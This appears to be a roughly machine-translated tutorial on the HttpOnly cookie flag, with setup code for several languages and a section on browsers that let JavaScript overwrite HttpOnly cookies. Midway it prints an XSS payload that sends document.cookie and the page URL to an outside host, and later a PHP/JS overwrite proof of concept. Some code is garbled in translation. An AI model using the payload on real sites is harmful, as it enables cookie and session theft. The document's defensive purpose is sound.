1. What is HttpOnly?
If you set the HttpOnly attribute in the cookie, the cookie information cannot be read by the JS script, which can effectively prevent XSS attacks.
does the 2.javaEE API support?At present, Sun has not released the relevant API, but PHP, C # are implemented. Java EE brothers are more depressed, do not worry about the following flexible implementation
sample setup for 3.HttpOnly
Java EE
12 |
response.setHeader( "Set-Cookie" , "cookiename=value; Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly"); |
The meaning of the specific parameters is not elaborated again, after the set up through the JS script is not read the cookie, but the use of the following way can be read?
1 |
Cookie cookies[]=request.getCookies(); |
C #?
123 |
HttpCookie myCookie = new HttpCookie( "myCookie" ); myCookie.HttpOnly = true ; Response.AppendCookie(myCookie); |
vb.net?
123 |
Dim myCookie As HttpCookie = new HttpCookie( "myCookie" ) myCookie.HttpOnly = True Response.AppendCookie(myCookie) |
But in. NET 1.1, do you need to add it manually?
1 |
Response.Cookies[cookie].Path += ";HTTPOnly" ; |
PHP4?
1 |
header( "Set-Cookie: hidden=value; httpOnly" ); |
PHP5?
1 |
setcookie( "abc" , "test" , NULL, NULL, NULL, NULL, TRUE); |
The last parameter is the HttpOnly property
In practice, we can make firecookie see if the cookie we set is HttpOnly
The XSS attack statements are as follows:
XSS Exp:
Url=document.top.location.href;
Cookie=document.cookie;
C=new Image ();
C.src= ' http://www.loveshell.net/c.php?c= ' +cookie+ ' &u= ' +url;
How can we protect our sensitive cookies? Through the above analysis, the general cookie is obtained from the document object, we just let the sensitive cookie browser document is not visible on the line. Fortunately, now the browser in the setting of the cookie generally accepts a parameter called HttpOnly, like domain and other parameters, once the HttpOnly is set, you can not see the cookie in the browser Document object, The browser is not affected when browsing, because the cookie will be placed in the browser header to send out (including Ajax), the application is generally not in JS operation of these sensitive cookies, for some sensitive cookies we use HttpOnly, For some cookies that need to be manipulated in the application, we will not set it, thus guaranteeing the security of cookie information and ensuring the application. For httponly instructions You can refer to http://msdn2.microsoft.com/en-us/library/ms533046.aspx.
The header for the browser setting cookie is as follows:
Set-cookie: =[; =]
[; expires=] [; domain=]
[; Path=] [; secure] [; HttpOnly]
In PHP, for example, the Setcookie function has been added to the HttpOnly support in the PHP 5.2 version, for example:
Setcookie ("abc", "Test", null,null,null,null,true);
Security issues caused by cookies setting HttpOnly flag in the browser
Overwrite the HTTPONLY flag in cookies with JavaScript
When JavaScript can overwrite the HTTPONLY flag in a cookie, an attacker who discovers a Web site's XSS vulnerability can use the HttpOnly cookie to launch a session fixation attack (more about session Fixation attack content can be referred to the author's previous article [1]).
The consequence of the session fixation attack is that the attacker can impersonate the victim because it knows the victim's session ID. This assumes that the session is not regenerated when the app is successfully logged in. This is true, but the browser should not allow JavaScript to overwrite the HTTPONLY flag, because this overlay may be combined with the feature that some applications will not regenerate sessions after successful login, launching a session fixation attack.
What about security if you regenerate session ID after successful login? Can it be exploited by attackers? After logging in, the attacker switches the user to the attacker's own account by setting the user's session to the session that the attacker is using. The victim thought it was using his account, and in fact some sensitive information had been leaked to the attacker.
Browsers that allow JavaScript to overwrite HttpOnly cookies
The following browsers allow JavaScript to overwrite HttpOnly cookies, as confirmed by the author:
Safari
Opera Mobile
Opera Mini
BlackBerry Browser
Konqueror Browser
The issue has been submitted to the appropriate vendor (on February 14, 2014).
IE, Firefix and opera (standard installation versions) are not susceptible to these attacks.
Exploit exploits
Here's some sample code:
- <?
- Setcookie (' Cookie1 ', ++$_cookie[' Cookie1 '],time () +2592000, '/', ' ", 0, 1);
- Setcookie (' Cookie2 ', ++$_cookie[' Cookie2 '],time () +2592000, '/', ', 0,0);
- ?>
- <HTML>
- <?
- Print "Cookie1:". $_cookie[' Cookie1 ']. " <br> ";
- Print "Cookie2:". $_cookie[' Cookie2 ');
- ?>
- <script>alert (document.cookie); </Script>
- <script>document.cookie=' Cookie1=100;expires=thu, 2 20:00:00 UTC; path=/'; </Script>
- </HTML>
The process is as follows: Run this code, and then you can see that cookie1 (the HTTPONLY flag is set) has been overwritten by JavaScript writing.
Whether the cookie is HttpOnly